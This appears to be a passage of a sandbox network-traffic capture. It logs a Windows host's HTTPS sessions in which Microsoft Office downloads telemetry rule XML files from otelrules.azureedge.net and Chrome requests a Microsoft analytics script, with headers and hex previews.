                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1395
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                                      x-ms-request-id: 96190df9-401e-0016-6a8c-3a53e0000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164207Z-r1d97b99577dd2gchC1TEBz5ys00000008zg000000009dzu
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:07 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      107192.168.2.74983713.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:08 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:08 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:08 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1358
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                                      x-ms-request-id: 07391e4c-a01e-0032-018c-3a1949000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164208Z-1777c6cb754xrr98hC1TEB3kag00000009rg00000000980a
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:08 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      108192.168.2.74983813.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:08 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:08 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1389
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                                      x-ms-request-id: c363d3e9-d01e-0028-158c-3a7896000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164208Z-185f5d8b95crwqd8hC1NYCps680000000aeg00000000q4rs
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:09 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      109192.168.2.74983913.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:08 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:09 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1352
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                                      x-ms-request-id: 2767d90f-601e-005c-618c-3af06f000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164209Z-185f5d8b95c4hl5whC1NYCeex00000000agg0000000006au
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:09 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      110192.168.2.74984013.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:09 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:09 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1405
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                                      x-ms-request-id: f909e935-c01e-0049-358c-3aac27000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164209Z-185f5d8b95c5lcmhhC1NYCsnsw0000000adg000000016hym
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:09 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      111192.168.2.74984713.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:09 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:10 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1368
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                                      x-ms-request-id: df1e4bb0-c01e-0034-6f8a-3a2af6000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164210Z-1777c6cb7544nvmshC1TEBf7qc00000009p000000000f3af
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:10 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      112192.168.2.74984813.107.246.634436380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:09 UTC454OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                                                      Host: js.monitor.azure.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      If-None-Match: 0x8DCEC757C1AD1D1
                                                                                                                                                                                                                      If-Modified-Since: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                                                      2024-11-20 16:42:10 UTC786INHTTP/1.1 304 Not Modified
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:10 GMT
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                                                      Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                                                      ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                                                      x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                                                                      x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                                                      x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                      x-azure-ref: 20241120T164210Z-185f5d8b95c4hl5whC1NYCeex00000000ag0000000002ns9
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      113192.168.2.74984913.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:10 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:11 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1401
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                                      x-ms-request-id: 07391f24-a01e-0032-508c-3a1949000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164211Z-185f5d8b95cmd8vfhC1NYC0g4000000006f0000000003uwa
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:11 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      114192.168.2.74985013.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:10 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:11 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1364
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                                      x-ms-request-id: c9275c76-a01e-000d-7b8c-3ad1ea000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164211Z-r1d97b99577n5jhbhC1TEB74vn00000008zg00000000rc92
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:11 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      115192.168.2.74985113.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:11 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:11 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1397
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                                      x-ms-request-id: 5a5a1185-c01e-0079-408c-3ae51a000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164211Z-185f5d8b95c4bhwphC1NYCs8gw0000000ang00000000fcm9
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
